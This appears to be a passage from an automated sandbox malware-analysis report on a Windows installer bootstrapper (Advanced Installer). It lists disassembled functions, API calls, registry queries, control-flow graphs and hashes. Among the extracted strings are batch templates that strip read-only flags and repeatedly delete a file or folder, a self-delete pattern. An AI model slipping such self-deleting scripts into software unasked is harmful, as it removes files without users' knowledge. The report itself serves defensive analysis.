                                                    • RegQueryValueExW.ADVAPI32(00000000,CurrentVersion,00000000,00000000,?,?), ref: 00471F43
                                                    • RegQueryValueExW.KERNEL32(00000000,CurrentBuildNumber,00000000,00000000,?,?), ref: 00471FB8
                                                    • RegQueryValueExW.KERNEL32(00000000,ReleaseId,00000000,00000000,?,?), ref: 00472032
                                                    • RegQueryValueExW.KERNEL32(00000000,CSDVersion,00000000,00000000,?,?), ref: 00472084
                                                    • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00472118
                                                    • GetProcAddress.KERNEL32(00000000), ref: 0047211F
                                                    • __Init_thread_footer.LIBCMT ref: 00472133
                                                    • GetCurrentProcess.KERNEL32(?), ref: 00472156
                                                    • IsWow64Process.KERNEL32(00000000), ref: 0047215D
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00472197
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: QueryValue$Process$AddressCloseCurrentHandleInit_thread_footerModuleOpenProcWow64
                                                    • String ID: (c$CSDVersion$CurrentBuildNumber$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$IsWow64Process$ReleaseId$Software\Microsoft\Windows NT\CurrentVersion$kernel32
                                                    • API String ID: 1906320730-1100393421
                                                    • Opcode ID: f6d10fc7e3bb4019cbf8257bb48dd55b994cc510941a80d883b76b79693dc2f5
                                                    • Instruction ID: 28f677cfcdc3df5255e797cc6ca1f06287f4d3a1e97b914834a9b6f16df9869a
                                                    • Opcode Fuzzy Hash: f6d10fc7e3bb4019cbf8257bb48dd55b994cc510941a80d883b76b79693dc2f5
                                                    • Instruction Fuzzy Hash: 4D9193B19013289EEB20CF54CD45FEABBB6FB54710F00419AE509A72D0EB765E94CF94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004721D0 Relevance: 40.5, APIs: 4, Strings: 19, Instructions: 220registryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 43 4721d0-472248 RegOpenKeyExW 45 4724b2-4724cb 43->45 46 47224e-47227f RegQueryValueExW 43->46 47 4724de-4724f9 call 51fe6a 45->47 48 4724cd-4724d4 RegCloseKey 45->48 49 472281-472293 call 477a80 46->49 50 4722cf-4722fa RegQueryValueExW 46->50 48->47 58 472295-4722a2 49->58 59 4722a4-4722bb call 477a80 49->59 50->45 52 472300-472311 50->52 56 472313-47231b 52->56 57 47231d-47231f 52->57 56->56 56->57 57->45 60 472325-47232c 57->60 61 4722ca 58->61 67 4722c2-4722c8 59->67 68 4722bd 59->68 63 472330-47233e call 477a80 60->63 61->50 69 472340-472344 63->69 70 472349-472357 call 477a80 63->70 67->61 68->67 71 472484 69->71 75 472362-472370 call 477a80 70->75 76 472359-47235d 70->76 74 47248b-472498 71->74 77 4724aa-4724ac 74->77 78 47249a 74->78 82 472372-472376 75->82 83 47237b-472389 call 477a80 75->83 76->71 77->45 77->63 80 4724a0-4724a8 78->80 80->77 80->80 82->71 86 472394-4723a2 call 477a80 83->86 87 47238b-47238f 83->87 90 4723a4-4723a8 86->90 91 4723ad-4723bb call 477a80 86->91 87->71 90->71 94 4723c6-4723d4 call 477a80 91->94 95 4723bd-4723c1 91->95 98 4723d6-4723da 94->98 99 4723df-4723ed call 477a80 94->99 95->71 98->71 102 4723ef-4723f4 99->102 103 4723f9-472407 call 477a80 99->103 104 472481 102->104 107 472410-47241e call 477a80 103->107 108 472409-47240e 103->108 104->71 111 472427-472435 call 477a80 107->111 112 472420-472425 107->112 108->104 115 472437-47243c 111->115 116 47243e-47244c call 477a80 111->116 112->104 115->104 119 472455-472463 call 477a80 116->119 120 47244e-472453 116->120 123 472465-47246a 119->123 124 47246c-47247a call 477a80 119->124 120->104 123->104 124->74 127 47247c 124->127 127->104
                                                    APIs
                                                    • RegOpenKeyExW.KERNEL32(80000002,SYSTEM\CurrentControlSet\Control\ProductOptions,00000000,00020119,00000000), ref: 00472240
                                                    • RegQueryValueExW.KERNEL32(00000000,ProductType,00000000,00000000,?), ref: 0047227B
                                                    • RegQueryValueExW.KERNEL32(00000000,ProductSuite,00000000,00000000,?,?), ref: 004722F6
                                                    • RegCloseKey.KERNEL32(00000000), ref: 004724CE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: QueryValue$CloseOpen
                                                    • String ID: BackOffice$Blade$CommunicationServer$Compute Server$DataCenter$Embedded(Restricted)$EmbeddedNT$Enterprise$Personal$ProductSuite$ProductType$SYSTEM\CurrentControlSet\Control\ProductOptions$Security Appliance$ServerNT$Small Business$Small Business(Restricted)$Storage Server$Terminal Server$WinNT
                                                    • API String ID: 1586453840-3149529848
                                                    • Opcode ID: 3f40bd2fd2b89543ae3dba9e297a48b50d370e93684682a76cdd39582ce70aaa
                                                    • Instruction ID: 5d58b2d5451f9824f7f907f1efbf80d054494edb5171326acc81209dabbd50d7
                                                    • Opcode Fuzzy Hash: 3f40bd2fd2b89543ae3dba9e297a48b50d370e93684682a76cdd39582ce70aaa
                                                    • Instruction Fuzzy Hash: E871A3307003199BEB209B61CE41BEF76A5FB50744F50947AD90EAB782EB7CCD458789
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00487FC0 Relevance: 32.3, APIs: 3, Strings: 15, Instructions: 784COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0035AB90: GetProcessHeap.KERNEL32 ref: 0035ABE5
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035AC17
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035ACA2
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?), ref: 00488094
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004880C8
                                                      • Part of subcall function 0035A140: FindResourceW.KERNEL32(00000000,?,00000006,?,?,000000A0,80070057,8007000E,80004005,00371A24,00000000,?,?,?,*.*), ref: 0035A163
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: ByteCharInit_thread_footerMultiWide$FindHeapProcessResource
                                                    • String ID: %hu$A valid language was received from commnad line. This is:$AI_BOOTSTRAPPERLANGS$Advinst_Extract_$Code returned to Windows by setup:$Language of a related product is:$Language selected programatically for UI:$Language used for UI:$Languages of setup:$P\$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\$Software\Caphyon\Advanced Installer\$a[$nT$nT
                                                    • API String ID: 1419962739-2823011655
                                                    • Opcode ID: 9abd089a3f74ed7c30782580553803a0c4a7a6328320ba987971f8423af3c503
                                                    • Instruction ID: 554e5339f900940b9f607dbdc191248ed175de213addd899a495fea56b3c98e3
                                                    • Opcode Fuzzy Hash: 9abd089a3f74ed7c30782580553803a0c4a7a6328320ba987971f8423af3c503
                                                    • Instruction Fuzzy Hash: 445200709006099FDB11EB68CC05BAFBBB5BF41314F1486ADE915AB392DF389E04CB95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00454560 Relevance: 31.8, APIs: 8, Strings: 10, Instructions: 327libraryloaderfileCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1115 454560-45459e call 35ab90 1118 4545a0-4545cc 1115->1118 1119 45461e-45469f call 35a850 call 454a80 call 46c960 call 35a380 1115->1119 1124 4545ce-4545e9 call 456300 1118->1124 1125 4545eb-454606 call 456300 1118->1125 1136 4546a1-4546ca call 454b90 call 371a90 1119->1136 1137 4546f0-454742 call 456470 GetModuleHandleW 1119->1137 1132 454609-45461b 1124->1132 1125->1132 1149 4546d4-4546ea MoveFileW call 46c960 1136->1149 1150 4546cc-4546cf 1136->1150 1143 454744-454758 call 520372 1137->1143 1144 45477c-454783 1137->1144 1143->1144 1158 45475a-454779 GetProcAddress call 520328 1143->1158 1146 454785 1144->1146 1147 45478c-45479a 1144->1147 1146->1147 1151 4547d4-4547db 1147->1151 1152 45479c-4547b0 call 520372 1147->1152 1149->1137 1168 454a71-454a7b call 52b6e4 1149->1168 1150->1149 1156 4547e4-4547f2 1151->1156 1157 4547dd 1151->1157 1152->1151 1169 4547b2-4547d1 GetProcAddress call 520328 1152->1169 1161 4547f4-454808 call 520372 1156->1161 1162 45482c-454833 1156->1162 1157->1156 1158->1144 1161->1162 1174 45480a-454829 GetProcAddress call 520328 1161->1174 1166 454835 1162->1166 1167 45483c-4549e7 1162->1167 1166->1167 1172 4549f1-4549f3 call 42a630 1167->1172 1169->1151 1179 4549f8-454a03 1172->1179 1174->1162 1179->1172 1181 454a05-454a25 call 455f60 1179->1181 1184 454a27-454a2a 1181->1184 1185 454a2f-454a44 1181->1185 1184->1185 1186 454a46-454a49 1185->1186 1187 454a4e-454a70 call 51fe6a 1185->1187 1186->1187
                                                    APIs
                                                      • Part of subcall function 0035AB90: GetProcessHeap.KERNEL32 ref: 0035ABE5
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035AC17
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035ACA2
                                                    • MoveFileW.KERNEL32(?,?), ref: 004546DA
                                                    • GetModuleHandleW.KERNEL32(kernel32,?), ref: 0045471C
                                                    • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00454764
                                                    • GetProcAddress.KERNEL32(00000000,SetDllDirectory), ref: 004547BC
                                                    • __Init_thread_footer.LIBCMT ref: 004547CC
                                                    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00454814
                                                    • __Init_thread_footer.LIBCMT ref: 00454774
                                                      • Part of subcall function 00520328: EnterCriticalSection.KERNEL32(00637DCC,?,?,0035ACA7,006389FC,005A5FA0), ref: 00520332
                                                      • Part of subcall function 00520328: LeaveCriticalSection.KERNEL32(00637DCC,?,0035ACA7,006389FC,005A5FA0), ref: 00520365
                                                      • Part of subcall function 00520328: RtlWakeAllConditionVariable.NTDLL ref: 005203DC
                                                    • __Init_thread_footer.LIBCMT ref: 00454824
                                                      • Part of subcall function 0042A630: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 0042A671
                                                    Strings
                                                    • @echo off %%SystemRoot%%\System32\attrib.exe -r "%s" SET count=0 :try %%SystemRoot%%\System32\timeout.exe 5 SET /a count=%%count%%+1rd "%s" if %%count%% GTR %lu goto breakif exist "%s" goto try:break %%SystemRoot%%\System32\attrib.exe -r ", xrefs: 004545F0, 004545FF
                                                    • SetSearchPathMode, xrefs: 0045475E
                                                    • kernel32.dll, xrefs: 0045491F
                                                    • kernel32, xrefs: 00454717
                                                    • @;\, xrefs: 004548AF
                                                    • SetDllDirectory, xrefs: 004547B6
                                                    • @echo off %%SystemRoot%%\System32\attrib.exe -r "%s" :try del "%s" if exist "%s" goto try%%SystemRoot%%\System32\attrib.exe -r "%s" del "%s" | cls, xrefs: 004545D2
                                                    • @echo off %%SystemRoot%%\System32\attrib.exe -r "%s" SET count=0 :try %%SystemRoot%%\System32\timeout.exe 5 SET /a count=%%count%%+1del "%s" if %%count%% GTR %lu goto breakif exist "%s" goto try:break %%SystemRoot%%\System32\attrib.exe -r ", xrefs: 004545F7
                                                    • @echo off %%SystemRoot%%\System32\attrib.exe -r "%s" :try rd "%s" if exist "%s" goto try%%SystemRoot%%\System32\attrib.exe -r "%s" del "%s" | cls, xrefs: 004545D7, 004545DF
                                                    • SetDefaultDllDirectories, xrefs: 0045480E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Init_thread_footer$AddressProc$CriticalSection$ConditionDirectoryEnterFileHandleHeapLeaveModuleMoveProcessSystemVariableWake
                                                    • String ID: @;\$@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" :try del "%s" if exist "%s" goto try%%SystemRoot%%\System32\attrib.exe -r "%s" del "%s" | cls$@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" :try rd "%s" if exist "%s" goto try%%SystemRoot%%\System32\attrib.exe -r "%s" del "%s" | cls$@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" SET count=0 :try %%SystemRoot%%\System32\timeout.exe 5 SET /a count=%%count%%+1rd "%s" if %%count%% GTR %lu goto breakif exist "%s" goto try:break %%SystemRoot%%\System32\attrib.exe -r "$@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" SET count=0 :try %%SystemRoot%%\System32\timeout.exe 5 SET /a count=%%count%%+1del "%s" if %%count%% GTR %lu goto breakif exist "%s" goto try:break %%SystemRoot%%\System32\attrib.exe -r "$SetDefaultDllDirectories$SetDllDirectory$SetSearchPathMode$kernel32$kernel32.dll
                                                    • API String ID: 3437638698-1024950946
                                                    • Opcode ID: 8e7938454c3a5a82ea2dd6ce0d1dd5260db861929bfeeaafe251c257837766e7
                                                    • Instruction ID: 25fae5783804d89e40d8829747c639af6f766d57323adccd1c8249a7b5c10b0c
                                                    • Opcode Fuzzy Hash: 8e7938454c3a5a82ea2dd6ce0d1dd5260db861929bfeeaafe251c257837766e7
                                                    • Instruction Fuzzy Hash: ABE17CB09002489FDB20DFA4C849BEEBFF4FF55318F10415DE815AB292DB759A48CBA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00487C80 Relevance: 25.5, APIs: 10, Strings: 4, Instructions: 1034threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetActiveWindow.USER32 ref: 00487E50
                                                    • SetLastError.KERNEL32(0000000E), ref: 00487E6D
                                                    • GetCurrentThreadId.KERNEL32 ref: 00487E85
                                                    • EnterCriticalSection.KERNEL32(0063E7BC), ref: 00487EA2
                                                    • LeaveCriticalSection.KERNEL32(0063E7BC), ref: 00487EC5
                                                    • DialogBoxParamW.USER32(000007D0,00000000,003C8D40,00000000), ref: 00487EE2
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?), ref: 00488094
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004880C8
                                                      • Part of subcall function 00456270: MultiByteToWideChar.KERNEL32(00000003,00000000,80000004,000000FF,00000000,00000000,?,?,006394D0,004A03D0,?), ref: 00456288
                                                      • Part of subcall function 00456270: MultiByteToWideChar.KERNEL32(00000003,00000000,80000004,000000FF,?,-00000001), ref: 004562BA
                                                    • SetEvent.KERNEL32(?,?,00000000,?,00000001,?,?), ref: 00488299
                                                    • SetEvent.KERNEL32(?,00000000,?,?), ref: 0048834F
                                                      • Part of subcall function 00494550: DeleteFileW.KERNEL32(?,?,?,?,?,0048837F,?,?,?), ref: 0049457B
                                                      • Part of subcall function 0035AB90: GetProcessHeap.KERNEL32 ref: 0035ABE5
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035AC17
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035ACA2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$CriticalEventInit_thread_footerSection$ActiveCurrentDeleteDialogEnterErrorFileHeapLastLeaveParamProcessThreadWindow
                                                    • String ID: Advinst_Extract_$Code returned to Windows by setup:$FILES.7z$P^[
                                                    • API String ID: 2923632737-1804513603
                                                    • Opcode ID: 790795a8861eb4de3004d705462d08329c608fb87e85e08450fa1efe836e5b76
                                                    • Instruction ID: cf3bf21e6c9bcdaa7baca2104d670b5074b486d532957151a6fa1c434b5008da
                                                    • Opcode Fuzzy Hash: 790795a8861eb4de3004d705462d08329c608fb87e85e08450fa1efe836e5b76
                                                    • Instruction Fuzzy Hash: 5392B030900249DFDB11EBA8CC49BDEBBB4BF55314F14829EE405AB292DB789E44CF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00495ED0 Relevance: 18.2, APIs: 12, Instructions: 179threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1965 495ed0-495f01 1966 495f07-495f21 GetActiveWindow 1965->1966 1967 4960c6-4960d7 1965->1967 1968 495f2f-495f37 1966->1968 1969 495f23-495f25 call 48e3f0 1966->1969 1970 495f39-495f43 call 51fa13 1968->1970 1971 495f52-495f61 call 51fb15 1968->1971 1975 495f2a KiUserCallbackDispatcher 1969->1975 1970->1971 1978 495f45-495f4d SetLastError 1970->1978 1979 4960ef-4960f6 call 368f60 1971->1979 1980 495f67-495fcc GetCurrentThreadId EnterCriticalSection LeaveCriticalSection CreateDialogParamW 1971->1980 1975->1968 1981 495fd2-495fe9 GetCurrentThreadId 1978->1981 1983 4960fb-496105 call 35a850 1979->1983 1980->1981 1986 495feb-495ff2 1981->1986 1987 49604e 1981->1987 1990 496005-496042 call 470180 call 359bb0 1986->1990 1991 495ff4-496000 call 371a90 call 477070 1986->1991 1988 496051-496079 SetWindowTextW GetDlgItem SetWindowTextW 1987->1988 1988->1967 1993 49607b-496084 call 35ab90 1988->1993 1990->1988 2003 496044-49604c 1990->2003 1991->1990 1993->1983 2002 496086-4960a8 call 35a140 1993->2002 2008 4960da-4960ed GetDlgItem SetWindowTextW 2002->2008 2009 4960aa-4960bc 2002->2009 2003->1988 2008->2009 2009->1967 2010 4960be-4960c1 2009->2010 2010->1967
                                                    APIs
                                                    • GetActiveWindow.USER32 ref: 00495F0A
                                                    • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?), ref: 00495F47
                                                    • GetCurrentThreadId.KERNEL32 ref: 00495FD2
                                                    • SetWindowTextW.USER32(?,00000000), ref: 0049605C
                                                    • GetDlgItem.USER32(?,000003E9), ref: 00496066
                                                    • SetWindowTextW.USER32(00000000,?), ref: 00496072
                                                    • GetDlgItem.USER32(?,00000002), ref: 004960DF
                                                    • SetWindowTextW.USER32(00000000,?), ref: 004960E7
                                                      • Part of subcall function 0048E3F0: GetDlgItem.USER32(?,00000002), ref: 0048E410
                                                      • Part of subcall function 0048E3F0: GetWindowRect.USER32(00000000,?), ref: 0048E426
                                                      • Part of subcall function 0048E3F0: ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,00495F2A,?,?,?,?,?,?), ref: 0048E43F
                                                      • Part of subcall function 0048E3F0: InvalidateRect.USER32(00000000,00000000,00000001,?,?,?,?,?,?,?,00495F2A,?,?), ref: 0048E44A
                                                      • Part of subcall function 0048E3F0: GetDlgItem.USER32(00000000,000003E9), ref: 0048E45C
                                                      • Part of subcall function 0048E3F0: GetWindowRect.USER32(00000000,?), ref: 0048E472
                                                      • Part of subcall function 0048E3F0: SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000206,?,?,?,?,?,?,?,00495F2A), ref: 0048E4B5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Window$Item$RectText$ActiveCurrentErrorInvalidateLastShowThread
                                                    • String ID:
                                                    • API String ID: 127311041-0
                                                    • Opcode ID: 9d37f4982c34f02e11d510ed804c729b2e65c8d4c9f4a197b4c60d35c1df8733
                                                    • Instruction ID: 52e56b1b0961f8f49de86c8f1ecef87a1261ac8ef7aea2054c5fbe74cc18a494
                                                    • Opcode Fuzzy Hash: 9d37f4982c34f02e11d510ed804c729b2e65c8d4c9f4a197b4c60d35c1df8733
                                                    • Instruction Fuzzy Hash: A261D171500604EFDB21DF68CC48B5ABFB5FF04320F15826AE8159B2E1CB75A904CF95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0051F7A5 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 58libraryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2011 51f7a5-51f7b0 2012 51f7b2-51f7be RtlDecodePointer 2011->2012 2013 51f7bf-51f7d6 LoadLibraryExA 2011->2013 2014 51f850 2013->2014 2015 51f7d8-51f7e3 call 51f855 2013->2015 2016 51f852-51f854 2014->2016 2018 51f7e8-51f7ed 2015->2018 2018->2014 2019 51f7ef-51f804 call 51f855 2018->2019 2019->2014 2022 51f806-51f81b call 51f855 2019->2022 2022->2014 2025 51f81d-51f832 call 51f855 2022->2025 2025->2014 2028 51f834-51f84e DecodePointer 2025->2028 2028->2016
                                                    APIs
                                                    • RtlDecodePointer.NTDLL(?,00000000,?,0051FB44,00637D7C,?,00000000,?,00495F5C,?,00000000,00000000,?,?), ref: 0051F7B7
                                                    • LoadLibraryExA.KERNEL32(atlthunk.dll,00000000,00000800,?,00000000,?,0051FB44,00637D7C,?,00000000,?,00495F5C,?,00000000,00000000), ref: 0051F7CC
                                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0051F848
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DecodePointer$LibraryLoad
                                                    • String ID: AtlThunk_AllocateData$AtlThunk_DataToCode$AtlThunk_FreeData$AtlThunk_InitData$atlthunk.dll
                                                    • API String ID: 1423960858-1745123996
                                                    • Opcode ID: 5cdd812e770eaa124a951e6ce38444fa36df45be26c40818232b78ace18bfc32
                                                    • Instruction ID: a940d4cf0504d82a1caea0b61a68b51b01e933297d786e054111885252c91b19
                                                    • Opcode Fuzzy Hash: 5cdd812e770eaa124a951e6ce38444fa36df45be26c40818232b78ace18bfc32
                                                    • Instruction Fuzzy Hash: DC012670640612BBEB116B109C17FE93F957F42758F050078BC08BA2F2DBB19989D3D5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0046CF10 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 234COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2029 46cf10-46cf43 call 46c960 2032 46cf45-46cf58 2029->2032 2033 46cf59-46cf92 PathIsUNCW call 46cb90 2029->2033 2036 46d121-46d18a call 35a850 CreateFileW 2033->2036 2037 46cf98-46cfc8 call 35a380 2033->2037 2042 46d1a0 2036->2042 2043 46d18c-46d198 GetFileSize 2036->2043 2044 46d072-46d08e 2037->2044 2045 46cfce 2037->2045 2047 46d1a2-46d1b2 2042->2047 2043->2042 2046 46d19a-46d19e 2043->2046 2049 46d090-46d093 2044->2049 2050 46d098-46d0ba call 456ea0 2044->2050 2048 46cfd0-46cff3 call 35a380 call 3711b0 2045->2048 2046->2047 2051 46d1b4-46d1bb CloseHandle 2047->2051 2052 46d1c2-46d1d5 2047->2052 2048->2036 2059 46cff9-46cffc 2048->2059 2049->2050 2051->2052 2059->2036 2060 46d002-46d022 call 3711b0 CreateDirectoryW 2059->2060 2063 46d0bb-46d0c0 2060->2063 2064 46d028-46d036 GetLastError 2060->2064 2065 46d0c2-46d0c8 call 46aaa0 2063->2065 2066 46d0cd-46d0df call 3711b0 2063->2066 2064->2066 2067 46d03c-46d040 2064->2067 2065->2066 2066->2036 2075 46d0e1-46d105 call 3711b0 2066->2075 2067->2066 2069 46d046-46d049 2067->2069 2071 46d053-46d065 2069->2071 2072 46d04b-46d04e call 46c5d0 2069->2072 2076 46d067-46d06a 2071->2076 2077 46d06f 2071->2077 2072->2071 2080 46d107-46d10a 2075->2080 2081 46d10f-46d116 2075->2081 2076->2077 2077->2044 2080->2081 2081->2077 2082 46d11c 2081->2082 2082->2048
                                                    APIs
                                                    • PathIsUNCW.SHLWAPI(?,D13B3340,?,?,?), ref: 0046CF5B
